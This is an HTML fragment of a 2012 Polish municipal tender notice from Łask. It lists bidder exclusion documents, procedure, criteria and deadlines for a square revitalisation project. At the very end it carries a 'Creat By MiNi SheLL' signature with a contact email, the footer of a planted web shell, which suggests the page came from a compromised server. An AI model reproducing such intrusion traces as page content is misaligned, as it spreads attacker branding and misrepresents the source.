<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi załącznik do Specyfikacji Istotnych Warunków Zamówienia. W jej treści, która nie podlega negocjacjom, podano wszelkie istotne dla Zamawiającego warunki realizacji zamówienia oraz dopuszczalne zmiany postanowień umowy. Dopuszcza się ponadto w porozumieniu z Wykonawcą wprowadzenie do treści umowy drobnych zmian i korekt, jednak wyłącznie w zakresie niepowodującym istotnych zmian przedstawionych warunków handlowych niekorzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lask.pl/archiwum/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łasku, ul. Warszawska 14, 98-100 Łask.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2012 godzina 10:30, miejsce: Urząd Miejski w Łasku, ul. Warszawska 14, 98-100 Łask, parter - sala 100 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie stanowi część projektu pn. Rewitalizacja Placu 11 Listopada w Łasku współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007- 2013. Oś Priorytetowa VI Odnowa obszarów miejskich Działanie VI.1 Rewitalizacja obszarów problemowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com